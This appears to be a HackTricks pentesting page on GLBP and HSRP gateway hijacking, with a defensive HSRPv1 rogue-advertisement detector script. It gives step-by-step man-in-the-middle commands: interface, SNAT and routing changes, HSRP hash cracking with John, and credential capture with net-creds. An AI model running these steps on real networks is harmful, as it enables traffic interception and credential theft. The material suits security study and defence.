hacktricks/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md

# GLBP & HSRP Attacks
<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

## FHRP Hijacking Overview
### Understanding FHRP
First Hop Redundancy Protocol (FHRP) is the collective name for protocols that provide network resilience by presenting multiple physical routers as a single virtual gateway, improving both load distribution and fault tolerance. Cisco Systems introduced two notable FHRP protocols: GLBP and HSRP.
### GLBP Protocol Details
Developed by Cisco, GLBP (Gateway Load Balancing Protocol) operates atop the TCP/IP stack, using UDP on port 3222 for communication. Routers within a GLBP group send "hello" packets every 3 seconds. Absence of these packets for 10 seconds from a router indicates its failure. However, these timer settings are adjustable.
### GLBP Operation and Load Balancing
GLBP enables load sharing across multiple routers using a single virtual IP and several virtual MAC addresses. Every router in the group forwards packets. Unlike HSRP/VRRP, GLBP provides true load balancing, with three modes:
- **Host-Dependent:** Ensures a host receives the same AVF MAC address, preserving NAT configurations.
- **Round-Robin:** The default mode where AVF MAC addresses are alternately distributed.
- **Weight-based Round-Robin:** Balances load based on a predefined "Weight" metric.
### GLBP Domain Roles and Terminology
- **AVG (Active Virtual Gateway):** The primary router, distributing MAC addresses to other routers.
- **AVF (Active Virtual Forwarder):** A router handling network traffic.
- **GLBP Priority:** Decides the AVG, with a default of 100 and range from 1 to 255.
- **GLBP Weight:** Indicates the router's load level, adjustable manually or via Object Tracking.
- **GLBP Virtual IP Address:** Acts as the default gateway for connected devices.
For communication, GLBP uses the reserved multicast address 224.0.0.102 and UDP port 3222. "Hello" packets are sent every 3 seconds, and routers are marked as "dead" if a packet isn't received within 10 seconds.
### GLBP Attack Mechanism
An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.
### Executing a GLBP Attack with Loki
[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.
Attack Steps:
1. Switch to promiscuous mode and enable IP forwarding.
2. Identify the target router and retrieve its IP.
3. Generate a Gratuitous ARP.
4. Inject a malicious GLBP packet, impersonating the AVG.
5. Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP.
6. Implement SNAT for complete traffic visibility.
7. Adjust routing to ensure continued internet access through the original AVG router.
By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data.
For demonstration, here are the required command snippets:
```bash
# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.
### HSRP Hijacking Explained with Command Details
#### Overview of HSRP (Hot Standby Router Protocol)
HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
#### Roles and Terminology in HSRP
- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
- **HSRP Standby Router**: A backup router, ready to take over if the active router fails.
- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router.
- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup.
- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices.
#### HSRP Versions
HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval.
#### HSRP Attack Mechanism
HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
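
The detection counterpart to the GLBP and HSRP takeover mechanisms described above is the following added example; it is not code from this page, from Loki or from the referenced article. It decodes HSRPv1 payloads (UDP port 1985 to 224.0.0.2, the fixed 20-byte layout of RFC 2281) and flags the advertisements a defender would want to see: a sender that is not one of the known gateways, priority 255, a Coup message claiming the Active role, or the default plaintext key `cisco`. The `BASELINE` table, the sample capture and the source address `10.10.100.77` are constructed for the example; the virtual IP `10.10.100.254` and gateway `10.10.100.100` reuse the page's example addresses. The same allowlist-plus-priority logic applies to GLBP hellos on UDP/3222 to 224.0.0.102, but GLBP's TLV layout is not parsed here.

```python
"""Detect rogue HSRPv1 advertisements in captured UDP/1985 payloads.

HSRPv1 (RFC 2281) is carried in UDP port 1985 to 224.0.0.2; HSRPv2 uses
224.0.0.102 with a TLV layout and is not parsed here. The fixed 20-byte v1
layout: version, opcode, state, hellotime, holdtime, priority, group,
reserved, 8-byte authentication data, 4-byte virtual IP.
"""
import ipaddress
import struct

HSRP_V1_FMT = "!BBBBBBBx8s4s"  # 20 bytes, network byte order
OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}

# Expected HSRP deployment (an assumption for this example). Keys of "routers"
# are the real interface addresses of the two gateways, values their configured
# priorities. The virtual IP and gateway address reuse the page's example values.
BASELINE = {
    "group": 1,
    "virtual_ip": "10.10.100.254",
    "routers": {"10.10.100.100": 110, "10.10.100.101": 100},
    "auth": "S3cret",
}


def parse_hsrp_v1(payload: bytes) -> dict:
    """Decode one HSRPv1 payload into named fields."""
    if len(payload) < struct.calcsize(HSRP_V1_FMT):
        raise ValueError("truncated HSRPv1 payload")
    (version, opcode, state, hellotime, holdtime, priority, group,
     auth, vip) = struct.unpack(HSRP_V1_FMT, payload[:20])
    if version != 0:  # HSRPv1 carries version 0
        raise ValueError(f"not an HSRPv1 packet (version {version})")
    return {
        "opcode": OPCODES.get(opcode, f"unknown({opcode})"),
        "state": STATES.get(state, f"unknown({state})"),
        "hellotime": hellotime,
        "holdtime": holdtime,
        "priority": priority,
        "group": group,
        "auth": auth.rstrip(b"\x00").decode("ascii", "replace"),
        "virtual_ip": str(ipaddress.IPv4Address(vip)),
    }


def check_advertisement(src_ip: str, payload: bytes, baseline: dict = BASELINE) -> list:
    """Return the reasons (if any) this advertisement looks like a takeover attempt."""
    pkt = parse_hsrp_v1(payload)
    findings = []
    expected_prio = baseline["routers"].get(src_ip)
    if expected_prio is None:
        findings.append(f"{pkt['opcode']} from unexpected source {src_ip}")
    elif pkt["priority"] != expected_prio:
        findings.append(f"priority {pkt['priority']} differs from configured {expected_prio}")
    if pkt["priority"] == 255:
        findings.append("maximum priority 255 advertised")
    if pkt["opcode"] == "Coup":
        findings.append("Coup message: sender is claiming the Active role")
    if pkt["group"] != baseline["group"] or pkt["virtual_ip"] != baseline["virtual_ip"]:
        findings.append(f"group {pkt['group']} / virtual IP {pkt['virtual_ip']} not in baseline")
    if pkt["auth"] == "cisco":
        findings.append("default plaintext authentication 'cisco' in use")
    elif pkt["auth"] != baseline["auth"]:
        findings.append("authentication string does not match the deployed one")
    return findings


def audit_capture(capture, baseline: dict = BASELINE) -> dict:
    """Map each source IP that produced findings to its list of findings."""
    report = {}
    for src_ip, payload in capture:
        findings = check_advertisement(src_ip, payload, baseline)
        if findings:
            report.setdefault(src_ip, []).extend(findings)
    return report


# Constructed sample capture (src IP, UDP payload): an Active and a Standby
# hello from the two real gateways, then a hello from a host that is not a
# gateway, advertising priority 255 with the default "cisco" key.
SAMPLE_CAPTURE = [
    ("10.10.100.100", bytes.fromhex("00001003 0a6e0100 53336372 65740000 0a0a64fe")),
    ("10.10.100.101", bytes.fromhex("00000803 0a640100 53336372 65740000 0a0a64fe")),
    ("10.10.100.77", bytes.fromhex("00001003 0aff0100 63697363 6f000000 0a0a64fe")),
]

if __name__ == "__main__":
    for src, problems in audit_capture(SAMPLE_CAPTURE).items():
        for problem in problems:
            print(f"[!] {src}: {problem}")
```

Feed it the UDP payloads of a capture like the `hsrp_traffic.pcap` taken below (for instance via scapy's `rdpcap`, keeping packets with UDP destination port 1985). HSRPv2 uses a TLV format, and MD5-authenticated HSRP carries its digest outside the 8-byte plaintext field, so this parser only judges the plaintext key; bytes beyond the first 20 are ignored.
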
#### Steps for Bypassing HSRP Authentication
1. Save the network traffic containing HSRP data as a .pcap file.
```shell
tcpdump -w hsrp_traffic.pcap
```
2. Extract MD5 hashes from the .pcap file using hsrp2john.py.
```shell
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
```
3. Crack the MD5 hashes using John the Ripper.
```shell
john --wordlist=mywordlist.txt hsrp_hashes
```
#### Executing HSRP Injection with Loki
1. Launch Loki to identify HSRP advertisements.
2. Set the network interface to promiscuous mode and enable IP forwarding.
```shell
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
```
3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router.
4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic.
```shell
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```
5. Modify the routing table to route traffic through the former Active Router.
```shell
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic.
```shell
sudo python2 net-creds.py -i eth0
```
Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures.
# References
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)